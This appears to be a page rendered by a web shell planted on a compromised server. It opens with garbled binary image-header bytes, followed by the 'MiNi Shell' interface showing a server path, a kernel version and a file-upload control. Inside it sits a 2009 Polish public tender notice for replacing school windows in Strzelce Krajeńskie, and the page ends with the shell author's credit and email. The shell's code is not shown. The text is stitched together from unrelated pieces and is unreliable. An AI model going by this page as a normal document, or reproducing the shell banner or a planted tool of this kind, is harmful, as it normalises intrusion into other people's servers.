JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/287480-N-2009.html

<p class="kh_header"><b>Strzelce Krajeńskie: Częściowa wymiana istniejącej stolarki okiennej drewnianej na nową drewnianą 
w budynku dydaktycznym Zespołu Szkół Centrum Kształcenia Ustawicznego 
w Strzelcach Krajeńskich - II część</b><br>
<b>Numer ogłoszenia: 287480 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Strzelecko-Drezdenecki , ul. Ks. St. Wyszyńskiego 7, 66-500 Strzelce Krajeńskie, woj. lubuskie, tel. 095 7632380, faks 095 7631126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fsd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Częściowa wymiana istniejącej stolarki okiennej drewnianej na nową drewnianą 
w budynku dydaktycznym Zespołu Szkół Centrum Kształcenia Ustawicznego 
w Strzelcach Krajeńskich - II część.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest częściowa wymiana istniejącej stolarki okiennej drewnianej na nową drewnianą  w budynku dydaktycznym Zespołu Szkół Centrum Kształcenia Ustawicznego w Strzelcach Krajeńskich przy Alei Wolności 7. Projekt budowlany zakłada częściową wymianę istniejącej stolarki okiennej, która nie spełnia aktualnym norm izolacyjności cieplnej na okna z szybami  o współczynniku 1,1 W/m2k. Stolarka okienna ma być kompletnie wykończona wraz z okuciami i powłokami malarskimi. Oprócz samej wymiany należy także wykonać uzupełnienia tynków na ościeżach z ich pomalowaniem, wymianą parapetów wewnętrznych. Wszystkie wymiary i kształty stolarki należy pobrać i odtworzyć z natury na miejscu budowy.
Dane techniczne: Stolarka drewniana drewno mahoniowe (red meranti)  klejone z trzech warstw klejami wodoodpornymi klasy D4 bez łączeń na zewnętrznych warstwach. Kolor naturalny - lakierowany. (Należy dobrać do koloru części okien wymienionych w 2007 i 2009 roku).
Szklone wysokiej jakości szybami typu float. Zestaw szybowy o współczynniku K=1,1Wm2k z niewidocznymi tlenkami metali szlachetnych na zewnętrznej warstwie szyby, odpowiadającymi za ochronę przed utratą ciepła. 
Okna łukowe, okna uchylno - rozwierne o kierunku otwierania typowym dla lokalizacji okna. Uchwyty do uchylania okien należy zamieścić na wysokości max 1,50 od poziomu posadzki (uchwyty dobrać do wysokości części okien wymienionych w 2007 i 2009 roku). Zaleca się aby klamki w ramach okiennych miały wygląd dekoracyjny pasujący do stylu drewnianej stolarki. Wykonawca przed zamontowaniem klamek dokona ustaleń z Inwestorem (należy dobrać do klamek, które zostały zamontowane do okien w 2007 i 2009 roku). Przy produkcji okien należy zastosować profile zapewniające sztywność okna odpowiednią dla jego wielkości i bezpieczeństwo ich użytkowania w obiekcie szkolnym. Zastosowanie w wyznaczonych pomieszczeniach szyb i okuć antywłamaniowych uzgodnić na roboczo z Inwestorem. W celu wykonania zadania inwestycyjnego należy wykonać następujące prace budowlane:
- demontaż istniejących okien drewnianych i zagospodarowanie ich przez Wykonawcę robót,
- demontaż parapetów wewnętrznych,
- uzupełnienie tynków w miejscach z dużymi ubytkami powstałymi po demontażu okien skrzynkowych,
- montaż okien drewnianych jednoramowych w istniejące otwory okienne,
- montaż nowych parapetów wewnętrznych,
- uzupełnienie tynków na ościeżach i przy parapetach,
- dwukrotne szpachlowanie ościeży i uzupełnień pod parapetami,
- pomalowanie ościeży i uzupełnień pod parapetami farbami emulsyjnymi.
Wszystkie użyte materiały muszą spełniać wymagania ustawy Prawo Budowlane z dnia 7 lipca 1994 roku (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.). Dla drewna mahoniowego (red meranti) wymagane jest dołączenie aprobaty technicznej lub świadectwa dopuszczenia albo atestu materiałowego. 
Rodzaje odbiorów robót wymaganych przez inwestora: odbiór robót zanikających i ulegających zakryciu (odbiór częściowy wmontowanych okien przed pomalowaniem, odbiór końcowy robót). Końcowy odbiór wykonanych robót nastąpi po pisemnym powiadomieniu Zamawiającego o zakończeniu realizacji tego zamówienia w terminie 5 dni od daty jego otrzymania. Data otrzymania zawiadomienia przez Zamawiającego będzie uważana jako data wykonania tego zamówienia.
Przedmiot zamówienia należy wykonać zgodnie z pozwoleniem Lubuskiego Wojewódzkiego Konserwatora Zabytków (załącznik do opisu przedmiotu zamówienia). Konserwator dopuścił możliwość zastosowania drewna mahoniowego (red meranti) zaznaczając, iż forma i sposób wykończenia nowych okien musi odzwierciedlać stolarkę historyczną. Wszystkie roboty budowlane należy prowadzić zgodnie z warunkami BHP oraz pozostałymi obowiązującymi w tym zakresie przepisami prawa. Przed przystąpieniem do realizacji robót, szczególnie niebezpiecznych, należy przeprowadzić szkolenie na stanowiskach pracy zgodnie z obowiązującymi przepisami. Za przeprowadzenie takiego szkolenia odpowiedzialny jest kierownik robót. 
Przed przystąpieniem, do realizacji robót należy w miarę potrzeby sporządzić szczegółowy plan bezpieczeństwa i ochrony zdrowia w zakresie niezbędnym zgodnie z obowiązującymi przepisami. Szczegółowy zakres prac zawarty jest w Projekcie budowlanym i ten dokument stanowi podstawę do realizacji tego zamówienia.
Roboty budowlano - montażowe należy wykonać zgodnie z Warunkami technicznymi wykonania i odbioru robót. Wszystkie użyte do realizacji tego zamówienia materiały budowlane i urządzenia, muszą posiadać świadectwo lub atest dopuszczający do stosowania w budownictwie.
Przy odbiorze robót budowlanych Wykonawca zobowiązany jest do skompletowania i przekazania inwestorowi wszystkich w/w świadectw i atestów. Końcowy odbiór wykonanych robót nastąpi po pisemnym powiadomieniu Zamawiającego o zakończeniu realizacji tego zamówienia w terminie 5 dni od daty jego otrzymania. Data otrzymania tego zawiadomienia, przez Zamawiającego będzie uważana jako data wykonania tego zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.21.42.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości 2.000 zł. 
Wadium może być wniesione w jednej lub kilku następujących formach:
-pieniądzu, 
-poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-gwarancjach bankowych, 
-gwarancjach ubezpieczeniowych, 
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 4 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 ze zm.) 
Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego Bank PKO BP SA konto nr 82 1020 1967 0000 8502 0006 0822. 
Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału. 
Dowód wniesienia wadium należy dołączyć do składanej oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, (wykaz wykonanych prac z ostatnich 5 lat wg zał. druku) tj.; 
- wykonali w ostatnich pięciu latach 2 zamówienia publiczne o łącznej wartości minimum 100.000 zł odpowiadających swoim rodzajem i zakresem usług stanowiących przedmiot zamówienia, 
- Okres udzielonej gwarancji na wykonany przedmiot zamówienia powinien wynosić minimum 60 miesięcy.
c) dysponują niezbędnym potencjałem technicznym do wykonania zamówienia (wykaz sprzętu wg zał. druku )
d) dysponują osobami zdolnymi do wykonania zamówienia, 
-kierownik budowy z uprawnieniami, 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia:
- Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba,  że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. 
- Wykonawca ma prawo złożyć tylko jedną ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz ofertowy (załącznik nr 1 do SIWZ),
2. Wypełniony kosztorys ofertowy do wyceny usług (załącznik nr 2 do SIWZ),
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ustawy (załącznik nr 3 do SIWZ);
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Pełnomocnictwo (jeżeli upoważniono osobę(y) do reprezentacji),
7. Wykaz wykonanych usług w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (załącznik nr 4 do SIWZ).
8. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca (załącznik nr 5 do SIWZ);
9. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (załącznik nr 6 do SIWZ).
10. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
11. Polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
12. Dowód wniesienia wadium.
13. Aprobata techniczna lub świadectwo dopuszczenia lub atest materiałowy drewna mahoniowego (red meranti)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Rękojmia i gwarancja - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.fsd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Strzelcach Kraj. ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Kraj., e-mail: naczelnikrg@fsd.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 13:00, miejsce: Oferty należy złożyć w Starostwie Powiatowym w Strzelcach Kraj., ul. Ks. St. Wyszyńskiego 7, 66 - 500 Strzelce Kraj., w sekretariacie - pokój nr 103.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com